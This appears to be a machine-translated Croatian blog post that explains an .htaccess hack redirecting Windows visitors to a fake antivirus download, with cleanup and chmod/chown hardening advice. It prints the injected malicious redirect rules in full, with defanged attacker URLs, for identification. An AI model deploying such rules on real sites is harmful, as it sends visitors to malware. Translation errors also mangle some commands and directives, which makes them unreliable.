Novi oblik virusa o kojem vidim da se ne zna puno, utječe na web stranice hostirane na nepouzdani poslužitelji gdje mogu korisnički računi/računi poddomena “vidjeti” između njih. Točnije, svi hosting računi su smješteni u mapu “vhosts“, i autorsko pravo korisnička mapa IZ “vhosts” daje se općem korisniku… preprodavač u većini situacija. To je tipična metoda web poslužitelja koji ne koriste WHM/cPanel.
sadržaj
Djelovanje virusa .htaccess – .htaccess Hack
virus utjecati na datoteke .htaccesses mjesta žrtve. Dodani su redovi / direktiva koji se preusmjeravanje posjetitelja (dolaze s yahoo, msn, google, facebook, yaindex, twitter, myspace itd. stranica i portala s velikim prometom) na neke stranice koje nude “antivirusna rješenja“. Radi se o lažna antivirusna rješenja, o čemu sam pisao u uvodu iz Uklanjanje lažnih antivirusnih programa.
Evo kako jedan izgleda .htaccesses pogođeno: (nemojte pristupati URL-ovima u sadržaju redaka ispod)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3Prepisati na
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
rewritecond %{http_referer} .*wikipedia.*$ [nc,or]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pretraži.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]
Oni koji koriste WordPress pronaći će ove retke u datoteci .htaccesses IZ javno_html. Osim toga, virus stvara identičan .htaccess u mapi WP-sadržaj.
*Postoje i situacije u kojima se umjesto peoriavascularsurgery.com pojavljuje dns.thesoulfoodcafe.com ili druge adrese.
Što ovaj virus radi?
Nakon preusmjeravanja, posjetitelja raširenih ruku dočekuje poruka:
Upozorenje!
Vaše računalo sadrži različite znakove prisutnosti virusa i malware programa. Vaš sustav zahtijeva hitnu antivirusnu provjeru!
System Security izvršit će brzo i besplatno skeniranje vašeg računala na viruse i zlonamjerne programe.
Bez obzira koji gumb pritisnemo, odvest ćemo se na stranicu “Moje računalo“, stvoren za oponašanje XP dizajn. Ovdje počinje automatski “postupak skeniranja”, na kraju kojeg otkrivamo da “zaraženi smo”.
Nakon pritiska na OK ili Odustani, započet će preuzetidatoteke setup.exe. Ovaj setup.exe je lažni antivirus koji utječe na sustav. Instalirat će niz malware aplikacija koje će dalje širiti zaražene poveznice, a osim ovih Softver antivirus (također lažno) koje je žrtva pozvana kupiti.
Mogu ga koristiti oni koji su već bili u kontaktu s ovim oblikom virusa Uklanjanje lažnih antivirusnih programa. Također se preporučuje skeniranje cijelog HDD-a. preporučiti Kaspersky Internet sigurnost ili Kaspersky Anti Virus.
Ovaj oblik virusa utječe na operativne sustave posjetitelja s operativnim sustavima Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 i Windows 95. Do sada nisu poznati slučajevi infekcije Windows Vista i Windows 7 operativnih sustava.
Kako možemo ukloniti ovaj .htaccess virus s poslužitelja i kako možemo spriječiti infekciju.
1. Analiza datoteka i brisanje sumnjivih kodova. Kako biste bili sigurni da nije zahvaćena samo datoteka .htaccesses dobro je analiziramo sve datoteke .php i .js.
2. Prepisujemo .htaccess datoteku i postavljamo je chmod 644 ili 744 samo s pravima pisanja korisnik-ul vlasnik.
3. Prilikom izrade hosting računa za web mjesto, u mapi /dom ili /webroot automatski će se stvoriti mapa koja obično ima ime korisnika (korisnik za cpanel, ftp, itd.). Kako bi se spriječilo upisivanje podataka i prijenos virusa s jednog korisnika na drugog, preporuča se na svakoj korisničkoj mapi postaviti:
Chmod 644 Sau 744, 755 – naznačeno je 644.
chown -R broj_korisnika broj_mape.
chgrp -R broj_korisnika broj_mape
je -sve kako biste provjerili jesu li modovi ispravno postavljeni. Trebalo bi se pojaviti nešto poput ovoga:
drwx–x–x 12 dinamics dinamics 4096 6. svibnja 14:51 dinamics/
drwx–x–x 10 duran duran 4096 7. ožujka 07:46 duran/
drwx–x–x 12 epruveta epruvete 4096 29. sij 11:23 epruvete/
drwxr-xr-x 14 express express 4096 26. veljače 2009. express/
drwxr-xr-x 9 oni oni 4096 19. svibnja 01:09 oni/
drwx–x–x 9 farma farma 4096 19. prosinac 22:29 farma/
Ako će jedan od gore navedenih korisnika imati FTP zaražene datoteke, neće moći poslati virus drugom hostiranom korisniku. To je minimalna sigurnosna mjera za zaštitu računa koji se nalaze na web poslužitelju.
Uobičajeni elementi domena zahvaćenih ovom vrstom virusa.
Sve zahvaćene domene preusmjeravaju posjetitelje na stranice koje sadrže naziv domene “/glavni.php?e=4&h“.
Ovaj “virus de .htaccess” utječe na bilo koju vrstu CMS-a (Joomla, WordPress, phpBB, itd) koji koristi .htaccesses.
.htaccess Virus Hack & Preusmjeri.
